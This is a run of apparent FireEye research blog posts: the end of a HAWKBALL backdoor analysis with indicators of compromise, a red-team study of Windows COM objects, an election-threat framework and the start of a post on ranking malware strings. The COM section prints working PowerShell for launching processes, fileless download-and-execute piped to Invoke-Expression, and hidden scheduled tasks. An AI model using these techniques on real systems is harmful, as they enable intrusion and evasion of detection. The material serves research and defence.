Figure 7: Mutex creation

After the mutex is created, the malware writes another entry in the logfile in %TEMP% with the values 32 and 0.

Network Communication

HAWKBALL is a backdoor that communicates with a single hard-coded C2 server using HTTP. The C2 server is obtained from the decrypted config file, as shown in Figure 5. The network request is formed with hard-coded values such as the User-Agent. The malware also sets other request header fields, such as:

  • Content-Length: <content_length>
  • Cache-Control: no-cache
  • Connection: close

The malware sends an HTTP GET request to its C2 IP address over port 443. Figure 8 shows the GET request sent over the network.


Figure 8: Network request

The network request is formed with four parameters in the format shown in Figure 9.

Format = "?t=%d&&s=%d&&p=%s&&k=%d"


Figure 9: GET request parameters formation

Table 1 shows the GET request parameters.

Value    Information
t        Initially set to 0
s        Initially set to 0
p        String from decrypted config at 0x68
k        The result of GetTickCount()

Table 1: GET request parameters
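To make the parameter mapping concrete, a hedged PowerShell sketch of how the first beacon URL could be assembled is shown below. The defanged C2 address and the p value are taken from the indicators later in this post, and [Environment]::TickCount stands in for GetTickCount(); none of this is the malware's actual code.

# Illustrative reconstruction of the first beacon URL only.
$t = 0; $s = 0; $p = "wGH^69"; $k = [Environment]::TickCount
"http://149.28.182[.]78/?t=$t&&s=$s&&p=$p&&k=$k"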

If the returned response is 200, then the malware sends another GET request (Figure 10) with the following parameters (Figure 11).

Format = "?e=%d&&t=%d&&k=%d"


Figure 10: Second GET request


Figure 11: Second GET request parameters formation

Table 2 shows information about the parameters.

Value    Information
e        Initially set to 0
t        Initially set to 0
k        The result of GetTickCount()

Table 2: Second GET request parameters

If the returned response is 200, the malware examines the Set-Cookie field. This field provides the Command ID. As shown in Figure 10, the field Set-Cookie responds with ID=17.

This Command ID acts as the index into a function table created by the malware. Figure 12 shows the creation of the virtual function table that will perform the backdoor’s command.


Figure 12: Function table

Table 3 shows the commands supported by HAWKBALL.

Command    Operation Performed
0          Set URI query string to value
16         Unknown
17         Collect system information
18         Execute a provided argument using CreateProcess
19         Execute a provided argument using CreateProcess and upload output
20         Create a cmd.exe reverse shell, execute a command, and upload output
21         Shut down reverse shell
22         Unknown
23         Shut down reverse shell
48         Download file
64         Get drive geometry and free space for logical drives C-Z
65         Retrieve information about provided directory
66         Delete file
67         Move file

Table 3: HAWKBALL commands

Collect System Information

Command ID 17 indexes to a function that collects the system information and sends it to the C2 server. The system information includes:

  • Computer Name
  • User Name
  • IP Address
  • Active Code Page
  • OEM Page
  • OS Version
  • Architecture Details (x32/x64)
  • String at 0x68 offset from decrypted config file

This information is retrieved from the victim using the following WINAPI calls:

Format = "%s;%s;%s;%d;%d;%s;%s %dbit"

  • GetComputerNameA
  • GetUserNameA
  • Gethostbyname and inet_ntoa
  • GetACP
  • GetOEMCP
  • GetCurrentProcess and IsWow64Process


Figure 13: System information

The collected system information is concatenated together with a semicolon separating each field:

WIN732BIT-L-0;Administrator;10.128.62.115;1252;437;d0c;Windows 7 32bit

This information is encrypted using an XOR operation. The response from the second GET request is used as the encryption key. As shown in Figure 10, the second GET request responds with a 4-byte XOR key. In this case the key is 0xE5044C18.
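The following PowerShell sketch illustrates the 4-byte rolling XOR using the key above; the byte order in which the key is applied is an assumption, and the sample string is the concatenated system information shown earlier.

# Byte order of the key is an assumption for illustration.
$key  = [byte[]](0xE5, 0x04, 0x4C, 0x18)
$data = [System.Text.Encoding]::ASCII.GetBytes("WIN732BIT-L-0;Administrator;10.128.62.115;1252;437;d0c;Windows 7 32bit")
$enc  = for ($i = 0; $i -lt $data.Length; $i++) { $data[$i] -bxor $key[$i % 4] }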

Once encrypted, the system information is sent in the body of an HTTP POST. Figure 14 shows data sent over the network with the POST request.


Figure 14: POST request

In the request header, the field Cookie is set with the command ID of the command for which the response is sent. As shown in Figure 14, the Cookie field is set with ID=17, which is the response for the previous command. In the received response, the next command is returned in field Set-Cookie.

Table 4 shows the parameters of this POST request.

Parameter    Information
e            Initially set to 0
t            Decimal form of the little-endian XOR key
k            The result of GetTickCount()

Table 4: POST request parameters

Create Process

The malware creates a process with specified arguments. Figure 15 shows the operation.


Figure 15: Command create process

Delete File

The malware deletes the file specified as an argument. Figure 16 shows the operation.


Figure 16: Delete file operation

Get Directory Information

The malware gets information for the provided directory address using the following WINAPI calls:

  • FindFirstFileW
  • FindNextFileW
  • FileTimeToLocalFileTime
  • FileTimeToSystemTime

Figure 17 shows the API used for collecting information.


Figure 17: Get directory information

Get Disk Information

This command retrieves the drive information for drives C through Z along with available disk space for each drive.


Figure 18: Retrieve drive information

The information is stored in the following format for each drive:

Format = "%d+%d+%d+%d;"

Example: "8+512+6460870+16751103;"

The information for all the available drives is combined and sent to the server using an operation similar to Figure 14.

Anti-Debugging Tricks

Debugger Detection With PEB

The malware queries the value for the flag BeingDebugged from PEB to check whether the process is being debugged.


Figure 19: Retrieve value from PEB

NtQueryInformationProcess

The malware uses the NtQueryInformationProcess API to detect if it is being debugged. The following flags are used:

  • Passing value 0x7 to ProcessInformationClass:


Figure 20: ProcessDebugPort verification

  • Passing value 0x1E to ProcessInformationClass:


Figure 21: ProcessDebugFlags verification

  • Passing value 0x1F to ProcessInformationClass:


Figure 22: ProcessDebugObject

Conclusion

HAWKBALL is a new backdoor that provides features attackers can use to collect information from a victim and deliver new payloads to the target. At the time of writing, the FireEye Multi-Vector Execution (MVX) engine is able to recognize and block this threat. We advise that all industries remain on alert, though, because the threat actors involved in this campaign may eventually broaden the scope of their current targeting.

Indicators of Compromise (IOC)

MD5                                 Name
AC0EAC22CE12EAC9EE15CA03646ED70C    Doc.rtf
D90E45FBF11B5BBDCA945B24D155A4B2    hh14980443.wll

Network Indicators

  • 149.28.182[.]78:443
  • 149.28.182[.]78:80
  • http://149.28.182[.]78/?t=0&&s=0&&p=wGH^69&&k=<tick_count>
  • http://149.28.182[.]78/?e=0&&t=0&&k=<tick_count>
  • http://149.28.182[.]78/?e=0&&t=<int_xor_key>&&k=<tick_count>
  • Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2)

FireEye Detections

MD5: AC0EAC22CE12EAC9EE15CA03646ED70C
Product: FireEye Email Security, FireEye Network Security, FireEye Endpoint Security
Signature: FE_Exploit_RTF_EQGEN_7, Exploit.Generic.MVX
Action: Block

MD5: D90E45FBF11B5BBDCA945B24D155A4B2
Product: FireEye Email Security, FireEye Network Security, FireEye Endpoint Security
Signature: Malware.Binary.Dll, FE_APT_Backdoor_Win32_HawkBall_1, APT.Backdoor.Win.HawkBall
Action: Block

Acknowledgement

Thank you to Matt Williams for providing reverse engineering support.

Hunting COM Objects

COM objects have recently been used by penetration testers, Red Teams, and malicious actors to perform lateral movement. COM objects were studied by several other researchers in the past, including Matt Nelson (enigma0x3), who published a blog post on the subject in 2017. Some of these COM objects were also added to the Empire project. To improve the Red Team practice, FireEye performed research into the available COM objects on Windows 7 and 10 operating systems. Several interesting COM objects were discovered that allow task scheduling, fileless download and execute, and command execution. Although they are not security vulnerabilities on their own, these objects can be used to defeat detection based on process behavior and heuristic signatures.

What is a COM Object?

According to Microsoft, “The Microsoft Component Object Model (COM) is a platform-independent, distributed, object-oriented system for creating binary software components that can interact. COM is the foundation technology for Microsoft's OLE (compound documents), ActiveX (Internet-enabled components), as well as others.”

COM was created in the 1990s as a language-independent, binary interoperability standard that enables separate code modules to interact with each other. This can occur within a single process or across processes, and Distributed COM (DCOM) adds serialization, allowing Remote Procedure Calls across the network.

The term “COM Object” refers to an executable code section which implements one or more interfaces deriving from IUnknown.  IUnknown is an interface with 3 methods, which support object lifetime reference counting and discovery of additional interfaces.  Every COM object is identified by a unique binary identifier. These 128 bit (16 byte) globally unique identifiers are generically referred to as GUIDs.  When a GUID is used to identify a COM object, it is a CLSID (class identifier), and when it is used to identify an Interface it is an IID (interface identifier). Some CLSIDs also have human-readable text equivalents called a ProgID.

Since COM is a binary interoperability standard, COM objects are designed to be implemented and consumed from different languages.  Although they are typically instantiated in the address space of the calling process, there is support for running them out-of-process with inter-process communication proxying the invocation, and even remotely from machine to machine.

The Windows Registry contains a set of keys which enable the system to map a CLSID to the underlying code implementation (in a DLL or EXE) and thus create the object.

Methodology

The registry key HKEY_CLASSES_ROOT\CLSID exposes all the information needed to enumerate COM objects, including the CLSID and ProgID. The CLSID is a globally unique identifier associated with a COM class object. The ProgID is a programmer-friendly string representing an underlying CLSID.

The list of CLSIDs can be obtained using the PowerShell commands shown in Figure 1.

New-PSDrive -PSProvider registry -Root HKEY_CLASSES_ROOT -Name HKCR
Get-ChildItem -Path HKCR:\CLSID -Name | Select -Skip 1 > clsids.txt

Figure 1: Enumerating CLSIDs under HKCR

The output will resemble Figure 2.

{0000002F-0000-0000-C000-000000000046}
{00000300-0000-0000-C000-000000000046}
{00000301-A8F2-4877-BA0A-FD2B6645FB94}
{00000303-0000-0000-C000-000000000046}
{00000304-0000-0000-C000-000000000046}
{00000305-0000-0000-C000-000000000046}
{00000306-0000-0000-C000-000000000046}
{00000308-0000-0000-C000-000000000046}
{00000309-0000-0000-C000-000000000046}
{0000030B-0000-0000-C000-000000000046}
{00000315-0000-0000-C000-000000000046}
{00000316-0000-0000-C000-000000000046}

Figure 2: Abbreviated list of CLSIDs from HKCR

We can use the list of CLSIDs to instantiate each object in turn, and then enumerate the methods and properties exposed by each COM object. PowerShell exposes the Get-Member cmdlet that can be used to list methods and properties on an object easily. Figure 3 shows a PowerShell script to enumerate this information. Where possible in this study, standard user privileges were used to provide insight into available COM objects under the worst-case scenario of having no administrative privileges.

$Position  = 1
$Filename = "win10-clsid-members.txt"
$inputFilename = "clsids.txt"
ForEach($CLSID in Get-Content $inputFilename) {
      Write-Output "$($Position) - $($CLSID)"
      Write-Output "------------------------" | Out-File $Filename -Append
      Write-Output $($CLSID) | Out-File $Filename -Append
      $handle = [activator]::CreateInstance([type]::GetTypeFromCLSID($CLSID))
      $handle | Get-Member | Out-File $Filename -Append
      $Position += 1
}

Figure 3: PowerShell scriptlet used to enumerate available methods and properties

If you run this script, expect some interesting side-effect behavior such as arbitrary applications being launched, system freezes, or script hangs. Most of these issues can be resolved by closing the applications that were launched or by killing the processes that were spawned.

Armed with a list of all the CLSIDs and the methods and properties they expose, we can begin the hunt for interesting COM objects. Most COM servers (the code implementing a COM object) are implemented in a DLL whose path is stored in the registry, e.g. under the InprocServer32 key. This is useful because reverse engineering may be required to understand undocumented COM objects.
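As a short sketch, the implementing DLL for a given CLSID can be resolved like this, reusing the HKCR: drive created in Figure 1; the CLSID shown is Msxml2.XMLHTTP.3.0, which appears later in this post.

# Resolve the DLL that implements a COM server via its InprocServer32 key.
$clsid = "{F5078F35-C551-11D3-89B9-0000F81FE221}"
(Get-ItemProperty "HKCR:\CLSID\$clsid\InprocServer32").'(default)'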

On Windows 7, a total of 8,282 COM objects were enumerated. Windows 10 featured 3,250 new COM objects in addition to those present on Windows 7. Non-Microsoft COM objects were generally omitted because they cannot be reliably expected to be present on target machines, which limits their usefulness to Red Team operations. Selected Microsoft COM objects from the Windows SDK were included in the study for purposes of targeting developer machines.

Once the members were obtained, a keyword-based search approach was used to quickly yield results. For the purposes of this research, the following keywords were used: execute, exec, spawn, launch, and run.
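In practice, this triage step can be as simple as sweeping the member dump produced in Figure 3 for those keywords, for example:

# Case-insensitive keyword sweep over the enumerated members.
Select-String -Path "win10-clsid-members.txt" -Pattern "execute|exec|spawn|launch|run"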

One example was the {F1CA3CE9-57E0-4862-B35F-C55328F05F1C} COM object (WatWeb.WatWebObject) on Windows 7. This COM object exposed a method named LaunchSystemApplication as shown in Figure 4.


Figure 4: WatWeb.WatWebObject methods including the interesting LaunchSystemApplication method

The InprocServer32 entry for this object was set to C:\windows\system32\wat\watweb.dll, which is part of Microsoft’s Windows Genuine Advantage product key validation system. The LaunchSystemApplication method expected three parameters, but this COM object was not well-documented and reverse engineering was required, meaning it was time to dig through some assembly code.

Once C:\windows\system32\wat\watweb.dll is loaded in your favorite tool (in this case, IDA Pro), it’s time to find where this method is defined. Luckily, in this case, Microsoft exposed debugging symbols, making the reverse engineering much more efficient. Looking at the disassembly, LaunchSystemApplication calls LaunchSystemApplicationInternal, which, as one might suspect, calls CreateProcess to launch an application. This is shown in the Hex-Rays decompiler pseudocode in Figure 5.


Figure 5: Hex-Rays pseudocode confirming that LaunchSystemApplicationInternal calls CreateProcessW

But does this COM object allow creation of arbitrary processes? The argument passed to CreateProcess is user-controlled and is derived from the arguments passed to the function. However, notice the call to CWgpOobWebObjectBaseT::IsApprovedApplication prior to the CreateProcess call. The Hex-Rays pseudocode for this method is shown in Figure 6.


Figure 6: Hex-Rays pseudocode for the IsApprovedApplication method

The user-controlled string is validated against a specific pattern. In this case, the string must match slui.exe. Furthermore, the user-controlled string is then appended to the system path, meaning it would be necessary to, for instance, replace the real slui.exe to circumvent the check. Unfortunately, the validation performed by Microsoft limits the usefulness of this method as a general-purpose process launcher.

In other cases, code execution was straightforward. One example is the ProcessChain class with CLSID {E430E93D-09A9-4DC5-80E3-CBB2FB9AF28E}, which is implemented in C:\Program Files (x86)\Windows Kits\10\App Certification Kit\prchauto.dll. This COM class can be readily analyzed without looking at any disassembly listings, because prchauto.dll contains a TYPELIB resource containing a COM Type Library that can be viewed using Oleview.exe. Figure 7 shows the type library for ProcessChainLib, exposing a CommandLine property and a Start method. Start accepts a reference to a Boolean value.


Figure 7: Type library for ProcessChainLib as displayed in Interface Definition Language by Oleview.exe

Based on this, commands can be started as shown in Figure 8.

$handle = [activator]::CreateInstance([type]::GetTypeFromCLSID("E430E93D-09A9-4DC5-80E3-CBB2FB9AF28E"))
$handle.CommandLine = "cmd /c whoami"
$handle.Start([ref]$True)

Figure 8: Using the ProcessChainLib COM server to start a process

Enumerating and examining COM objects in this fashion turned up other interesting finds as well.

Fileless Download and Execute

For instance, the COM object {F5078F35-C551-11D3-89B9-0000F81FE221} (Msxml2.XMLHTTP.3.0) exposes an XML HTTP 3.0 feature that can be used to download arbitrary code for execution without writing the payload to the disk and without triggering rules that look for the commonly-used System.Net.WebClient. The XML HTTP 3.0 object is usually used to perform AJAX requests. In this case, data fetched can be directly executed using the Invoke-Expression cmdlet (IEX).

The example in Figure 9 executes our code locally:

$o = [activator]::CreateInstance([type]::GetTypeFromCLSID("F5078F35-C551-11D3-89B9-0000F81FE221")); $o.Open("GET", "http://127.0.0.1/payload", $False); $o.Send(); IEX $o.responseText;

Figure 9: Fileless download without System.Net.WebClient

Task Scheduling

Another example is {0F87369F-A4E5-4CFC-BD3E-73E6154572DD} which implements the Schedule.Service class for operating the Windows Task Scheduler Service. This COM object allows privileged users to schedule a task on a host (including a remote host) without using the schtasks.exe binary or the at command.

# Delay (in seconds) before the scheduled task first fires; value is illustrative.
$Delay = 30

# Helper to format dates as the ISO 8601 strings the Task Scheduler expects.
function Convert-Date {
        param(
             [datetime]$Date
        )
        PROCESS {
               $Date.ToUniversalTime().ToString("u") -replace " ","T"
        }
}

$TaskName = [Guid]::NewGuid().ToString()
$Instance = [activator]::CreateInstance([type]::GetTypeFromProgID("Schedule.Service"))
$Instance.Connect()
$Folder = $Instance.GetFolder("\")
$Task = $Instance.NewTask(0)
$Trigger = $Task.Triggers.Create(1)     # 1 = TASK_TRIGGER_TIME
$Trigger.StartBoundary = Convert-Date -Date ((Get-Date).AddSeconds($Delay))
$Trigger.EndBoundary = Convert-Date -Date ((Get-Date).AddSeconds($Delay + 120))
$Trigger.ExecutionTimeLimit = "PT5M"
$Trigger.Enabled = $True
$Trigger.Id = $TaskName
$Action = $Task.Actions.Create(0)       # 0 = TASK_ACTION_EXEC
$Action.Path = "cmd.exe"
$Action.Arguments = "/c whoami"
$Action.HideAppWindow = $True
$Folder.RegisterTaskDefinition($TaskName, $Task, 6, "", "", 3)

Figure 10: Scheduling a task

Conclusion

COM objects are very powerful, versatile, and integrated with Windows, which means that they are nearly always available. COM objects can be used to subvert different detection patterns including command line arguments, PowerShell logging, and heuristic detections. Stay tuned for part 2 of this blog series as we will continue to look at hunting COM objects.

Framing the Problem: Cyber Threats and Elections

This year, Canada, multiple European nations, and others will host high profile elections. The topic of cyber-enabled threats disrupting and targeting elections has become an increasing area of awareness for governments and citizens globally. To develop solutions and security programs to counter cyber threats to elections, it is important to begin with properly categorizing the threat. In this post, we’ll explore the various threats to elections FireEye has observed and provide a framework for organizations to sort these activities.

The Election Ecosystem: Targets

Historically, FireEye has observed targeting of a wide range of organizations connected to elections. In considering their role and criticality to the process of elections, these various entities can be grouped into three categories: core election infrastructure, supporting organizations involved in the administration of elections, and other groups that have a participatory role in the electoral process. All of these entities may be targeted for a variety of reasons to influence or collect intelligence on the electoral process and participants.

FireEye is aware of only limited indications of entities targeted in the first category (light blue area). Although we have not observed direct evidence that actors have manipulated the electoral process in any major national or regional election by infiltrating the systems or hardware used to record or tally votes, the sheer complexity of these systems prevents us from categorically stating that these systems have not been successfully compromised.

Moving outward into the gray section of the diagram, entities that fall into this category include organizations involved in the administration of elections. While these organizations may maintain networks separate from voting systems and tabulation platforms, they play important roles in overseeing and communicating results to the public. FireEye has witnessed breaches into a variety of these organizations, in some cases for the purpose of collecting intelligence or in others to coopt and display false information on publicly-facing systems as part of an influence campaign.

Lastly, FireEye has observed targeting of organizations that are involved in election campaigns and news coverage. Tactics we have witnessed include disinformation campaigns on adversary-maintained infrastructure and social media platforms. For example, in August 2017, we observed several inauthentic news websites created to mimic legitimate local and international media organizations ahead of a sub-Saharan African nation’s presidential election. A subset of the counterfeit domains appears to have been created in coordination with each other, if not by the same actor, to damage the reputation of the presidential nominee for the opposition party.

The Threat Activity

To counter and mitigate risks to elections, properly categorizing the specific activity and intent is important. While terms like “election interference” are often used to describe all of the threats in this space, some of the malicious activity FireEye has witnessed may fall outside this definition. Broadly speaking most election-related threats can be thought of in four categories: social-media enabled disinformation, cyber espionage, “hack and leak” campaigns, and attacks on critical election infrastructure.

  • Social-Media Enabled Disinformation: This category includes the activity FireEye has tracked from the Russia-affiliated Internet Research Agency (IRA) and various Iranian disinformation operations. In some cases, this has involved creating fraudulent content on controversial issues and seeking to promote it across social media platforms. In other examples, disinformation campaigns have focused on amplifying issues that already have organic interest. Some of these campaigns may also engage in politically motivated messaging on social media platforms prior to elections without a specific focus on electoral events.
  • Cyber Espionage: Nation-state actors like Russia-nexus APT28 and Sandworm Team, and China-nexus APT40, have carried out cyber espionage operations against multiple types of targets in the election ecosystem. These intrusions have targeted everything from political campaigns to election commissions, likely for a variety of reasons. In some cases, these actors are possibly seeking to obtain information on the policy stances of candidates and political parties. In other situations, particularly against election administrators or system vendors, it is possible that these intrusions are reconnaissance for further operations, seeking to understand network layouts that may allow them to move into more critical infrastructure.
  • “Hack and Leak” Campaigns: Some threat actors that FireEye has observed have utilized the data they’ve gained from espionage intrusions to then leak that information with the intent of influencing public perception. In this manner, they combine the previous two categories of activity. Notably, this tactic has been employed by Guccifer 2.0 and DC Leaks in the 2016 U.S. election. In some cases, similar tactics have leveraged compromised infrastructure to carry out disinformation operations, such as in the 2014 Ukrainian presidential campaign in which Russian-nexus actors posted erroneous election results from the compromised Ukrainian election commission website.
  • Attacks on Critical Election Infrastructure: Compromises of core critical infrastructure such as election management systems, voting systems, and electronic pollbooks represent the most severe risks to elections, with the potential to alter or delete votes, or to remove voters from voter rolls. Though this is an often-discussed risk, there is limited evidence of intrusion activity targeting core election infrastructure.

Of the activity described here, FireEye has observed the full spectrum from Russian-nexus actors: carrying out intrusions into organizations and stealing data, leaking that data through online personas and fronts, and targeting election infrastructure itself. From limited observations, China has for the most part focused solely on cyber espionage operations, as in the activity FireEye reported on targeting the 2018 Cambodian election. Driven by various motivations, hacktivists and criminal entities have also targeted parts of the election ecosystem, though FireEye has witnessed only limited evidence of such activity.

Conclusion

While there is increasing global awareness of threats to elections, election administrators and others continue to face challenges in ensuring the integrity of the vote. To properly counter threats to elections, individuals and organizations involved in the electoral process should:

  • Learn the Playbook of the Adversary: Proactive organizations can learn from the activity of threat actors uncovered in other elections and implement security controls that adapt to new tools and TTPs. Political campaigns and others should also educate staff and contractors on common spear-phishing tactics used by some of the primary APT groups.
  • Incorporate Threat Intelligence for Context: Operationally, security organizations can utilize threat intelligence to better differentiate and triage the most important alerts from untargeted commodity malware activity.
  • Anticipate External Threats: Beyond the internal networks of county governments and political campaigns, election administrators and risk management professionals involved in elections should prepare plans for dealing with leaked and compromised data, understanding how threat actors may utilize this for disinformation campaigns.

I will be speaking about cyber threats and elections during the FireEye Virtual Summit, so register today to learn more.

Learning to Rank Strings Output for Speedier Malware Analysis

Reverse engineers, forensic investigators, and incident responders have an arsenal of tools at their disposal to dissect malicious software binaries. When performing malware analysis, they successively apply these tools in order to gradually gather clues about a binary’s function, design detection methods, and ascertain how to contain its damage. One of the most useful initial steps is to inspect a binary’s printable characters via the Strings program. A binary will often contain strings if it performs operations like printing an error message, connecting to a URL, creating a registry key, or copying a file to a specific location – each of which provides crucial hints that can help drive future analysis.

Manually filtering out these relevant strings can be time consuming and error prone, especially considering that:

  • Relevant strings occur disproportionately less often than irrelevant strings.
  • Larger binaries can output upwards of tens of thousands of individual strings.
  • The definition of “relevant” can vary significantly across individual human analysts.

Investigators would never want to miss an important clue that could have reduced their time spent performing the malware analysis, or even worse, led them to draw incomplete or incorrect conclusions. In this blog post, we will demonstrate how the FireEye Data Science (FDS) and FireEye Labs Reverse Engineering (FLARE) teams recently collaborated to streamline this analyst pain point using machine learning.

Highlights

  • Running the Strings program on a piece of malware inevitably produces noisy strings mixed in with important ones, which can only be uncovered after sifting and scrolling through the entirety of its messy output. FireEye’s new machine learning model that automatically ranks strings based on their relevance for malware analysis speeds up this process at scale.
  • Knowing which individual strings are relevant often requires highly experienced analysts. Quality, security-relevant labeled training data can be time consuming and expensive to obtain, but weak supervision that leverages the domain expertise of reverse engineers helps alleviate this bottleneck.
  • Our proposed learning-to-rank model can efficiently prioritize Strings outputs from individual malware samples. On a dataset of relevant strings from over 7 years of malware reports authored by FireEye reverse engineers, it also performs well based on criteria commonly used to evaluate recommendation and search engines.

Background

Each string returned by the Strings program is a sequence of 3 or more printable characters ending with a null terminator, extracted independent of any surrounding context and file formatting. These loose criteria mean that Strings may identify sequences of characters as strings when they are not human-interpretable. For example, if consecutive bytes 0x31, 0x33, 0x33, 0x37, 0x00 appear within a binary, Strings will interpret this as “1337.” However, those ASCII characters may not actually represent that string per se; they could instead represent a memory address, CPU instructions, or even data utilized by the program. Strings leaves it up to the analyst to filter out the irrelevant strings that appear within its output. For instance, only a handful of the strings listed in Figure 1, which originate from an example malicious binary, are relevant from a malware analyst’s point of view.
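As a point of reference, the extraction rule described above can be approximated in a few lines of Python. This is a simplified illustration of the default ASCII case only, not the actual Strings implementation.

```python
import re
import sys

# Runs of 3 or more printable ASCII bytes, per the loose criteria described
# above. The real Strings program also extracts UTF-16LE (Unicode) strings
# and supports a configurable minimum length.
PRINTABLE_RUN = re.compile(rb"[\x20-\x7e]{3,}")

def extract_strings(path):
    """Return the printable ASCII runs found in a binary file."""
    with open(path, "rb") as f:
        data = f.read()
    return [m.group().decode("ascii") for m in PRINTABLE_RUN.finditer(data)]

if __name__ == "__main__":
    for s in extract_strings(sys.argv[1]):
        print(s)
```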


Figure 1: An example Strings output containing 44 strings for a toy sample with a SHA-256 value of eb84360ca4e33b8bb60df47ab5ce962501ef3420bc7aab90655fd507d2ffcedd.

Ranking strings in terms of descending relevance would make an analyst’s life much easier. They would then only need to focus their attention on the most relevant strings located towards the top of the list, and simply disregard everything below. However, solving the task of automatically ranking strings is not trivial. The space of relevant strings is unstructured and vast, and devising finely tuned rules to robustly account for all the possible variations among them would be a tall order.

Learning to Rank Strings Output

This task can instead be formulated in a machine learning (ML) framework called learning to rank (LTR), which has historically been applied to problems like information retrieval, machine translation, web search, and collaborative filtering. One way to tackle LTR problems is by using Gradient Boosted Decision Trees (GBDTs). GBDTs successively learn individual decision trees that reduce the loss using a gradient descent procedure, and ultimately use a weighted sum of every tree’s prediction as an ensemble. GBDTs with an LTR objective function can learn class probabilities to compute each string’s expected relevance, which can then be used to rank a given Strings output. We provide a high-level overview of how this works in Figure 2.
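The post does not name the specific GBDT implementation used, so as a hedged sketch only, the snippet below shows how an off-the-shelf library such as LightGBM exposes this kind of LTR objective; the feature matrix, labels, and group sizes are placeholders standing in for the real training data.

```python
import numpy as np
import lightgbm as lgb

# Placeholder training data: one row per string, integer labels in [0, 7],
# and one "group" entry per input file giving how many strings that file
# contributed, so the ranker only compares strings within the same
# Strings output.
X = np.random.rand(1000, 16)
y = np.random.randint(0, 8, size=1000)
groups = [100] * 10  # 10 files, 100 strings each

ranker = lgb.LGBMRanker(objective="lambdarank", n_estimators=200)
ranker.fit(X, y, group=groups)
```

With this setup, each boosting iteration adds a tree that nudges the ensemble toward orderings that place higher-relevance strings near the top of each group.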

In the initial train() step of Figure 2, over 25 thousand binaries are run through the Strings program to generate training data consisting of over 18 million total strings. Each training sample then corresponds to the concatenated list of ASCII and Unicode strings output by the Strings program on that input file. To train the model, these raw strings are transformed into numerical vectors containing natural language processing features like Shannon entropy and character co-occurrence frequencies, together with domain-specific signals like the presence of indicators of compromise (e.g. file paths, IP addresses, URLs, etc.), format strings, imports, and other relevant landmarks.
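The exact feature set is not public, so the sketch below is illustrative only: it computes Shannon entropy and a handful of regex-based indicator flags for a single string, the same flavor of features described above.

```python
import math
import re
from collections import Counter

def shannon_entropy(s):
    """Bits of entropy per character of the string."""
    if not s:
        return 0.0
    counts = Counter(s)
    total = len(s)
    return -sum((c / total) * math.log2(c / total) for c in counts.values())

# Illustrative indicator patterns, not the production feature definitions.
URL_RE    = re.compile(r"https?://", re.I)
IPV4_RE   = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
PATH_RE   = re.compile(r"(?i)^[a-z]:\\|^/")
FORMAT_RE = re.compile(r"%[sdxu]")

def featurize(s):
    """Turn one raw string into a numerical feature vector."""
    return [
        len(s),
        shannon_entropy(s),
        int(bool(URL_RE.search(s))),
        int(bool(IPV4_RE.search(s))),
        int(bool(PATH_RE.search(s))),
        int(bool(FORMAT_RE.search(s))),
    ]

print(featurize("http://198.51.100.7/gate.php"))
```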


Figure 2: The ML-based LTR framework ranks strings based on their relevance for malware analysis. This figure illustrates different steps of the machine learning modeling process: the initial train() step is denoted by solid arrows and boxes, and the subsequent predict() and sort() steps are denoted by dotted arrows and boxes.

Each transformed string’s feature vector is associated with a non-negative integer label that represents its relevance for malware analysis. Labels range from 0 to 7, with higher numbers indicating increased relevance. To generate these labels, we leverage the subject matter knowledge of FLARE analysts to apply heuristics and impose high-level constraints on the resulting label distributions. While this weak supervision approach may generate noise and spurious errors compared to an ideal case where every string is manually labeled, it also provides an inexpensive and model-agnostic way to integrate domain expertise directly into our GBDT model.
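The actual FLARE-derived heuristics are not published; purely as an illustration of the weak supervision idea, a labeling function might look something like the following, where every rule and label value is a hypothetical stand-in.

```python
import re

# Hypothetical labeling heuristics; the real rules encode FLARE analysts'
# domain expertise and are not reproduced here.
RULES = [
    (re.compile(r"https?://|\b(?:\d{1,3}\.){3}\d{1,3}\b"), 7),    # network indicators
    (re.compile(r"(?i)\\(software|system|currentversion)\\"), 6),  # registry-like paths
    (re.compile(r"(?i)^[a-z]:\\"), 5),                             # file paths
    (re.compile(r"%[sdxu]"), 4),                                   # format strings
    (re.compile(r"(?i)^(kernel32|user32|advapi32)\.dll$"), 1),     # ubiquitous imports
]

def weak_label(s):
    """Assign a relevance label from 0 (irrelevant) to 7 (highly relevant)."""
    for pattern, label in RULES:
        if pattern.search(s):
            return label
    return 0
```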

Next, during the predict() step of Figure 2, we use the trained GBDT model to predict ranks for the strings belonging to an input file that was not originally part of the training data; in this example query we use the Strings output shown in Figure 1. The model predicts ranks for each string in the query as floating-point numbers that represent expected relevance scores, and in the final sort() step of Figure 2, strings are sorted in descending order by these scores. Figure 3 illustrates how this resulting prediction achieves the desired goal of ranking strings according to their relevance for malware analysis.
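In code, the predict() and sort() steps reduce to scoring each string of the query file and sorting in descending order. The short snippet below builds on the extract_strings, featurize, and ranker objects defined in the earlier sketches, so it is a continuation of those assumptions rather than standalone code.

```python
# Rank the Strings output of a previously unseen file (the predict() and
# sort() steps). extract_strings, featurize, and ranker come from the
# sketches above.
strings = extract_strings("sample.bin")
scores = ranker.predict([featurize(s) for s in strings])
ranked = [s for _, s in sorted(zip(scores, strings), reverse=True)]
print(ranked[:10])  # the strings the model considers most relevant
```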


Figure 3: The resulting ranking on the strings depicted in both Figure 1 and in the truncated query of Figure 2. Contrast the relative ordering of the strings shown here to those otherwise identical lists.

The predicted and sorted string rankings in Figure 3 show network-based indicators on top of the list, followed by registry paths and entries. These reveal the potential C2 server and malicious behavior on the host. The subsequent output consisting of user-related information is more likely to be benign, but still worthy of investigation. Rounding out the list are common strings like Windows API functions and PE artifacts that tend to raise no red flags for the malware analyst.

Quantitative Evaluation

While it seems like the model qualitatively ranks the above strings as expected, we would like some quantitative way to assess the model’s performance more holistically. What evaluation criteria can we use to convince ourselves that the model generalizes beyond the coverage of our weak supervision sources, and to compare models that are trained with different parameters?

We turn to the recommender systems literature, which uses the Normalized Discounted Cumulative Gain (NDCG) score to evaluate ranking of items (i.e. individual strings) in a collection (i.e. a Strings output). NDCG sounds complicated, but let’s boil it down one letter at a time:

  • “G” is for gain, which corresponds to the magnitude of each string’s relevance.
  • “C” is for cumulative, which refers to the cumulative gain or summed total of every string’s relevance.
  • “D” is for discounted, which divides each string’s predicted relevance by a monotonically increasing function like the logarithm of its ranked position, reflecting the goal of having the most relevant strings ranked towards the top of our predictions.
